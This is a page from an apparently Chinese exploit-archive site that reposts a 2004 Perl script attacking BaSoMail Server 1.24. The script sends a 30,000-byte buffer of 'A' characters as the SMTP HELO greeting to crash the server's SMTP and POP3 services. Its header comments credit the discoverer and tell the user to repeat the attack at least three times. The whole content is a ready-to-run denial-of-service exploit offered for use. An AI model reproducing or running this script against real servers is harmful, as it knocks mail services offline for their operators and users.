首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit


http://www.gipsky.com/
#!/usr/bin/perl





###############################################

# BaSoMail Server POP3 and SMTP v1.24 D.o.S #

# Discovered by Ziv Kamir,exploited by KaGra #

# #

# This Sploit sends as HELO request 1 packet #

# of 30K of data.If U use it at least 3 times#

# SMTP and POP services will be D.o.Sed. #

# Tested in WinXP SP1 EnGlish #

###############################################









use Net::SMTP;

print "\n[*]BuiLDinG BuFfer...\n";

$evil = 'A'x30000 ;



print "[*]@@@...SenDing DeViL...HeLL UnleaSheD...wait at least 30 seconds...@@@\n";



$smtp = Net::SMTP->new('localhost',

Hello=>$evil,

Timeout=>30,



);



print "\nTarGet Has BeeN D.o.Sed,use Exploit at Least 3 times \n";

print "and then check if Server aLiVe!\n\n";

[2004-10-24]
<< Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit win xp/2000/2003 Connect Back shellcode for Overflow exploit 275 bytes >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号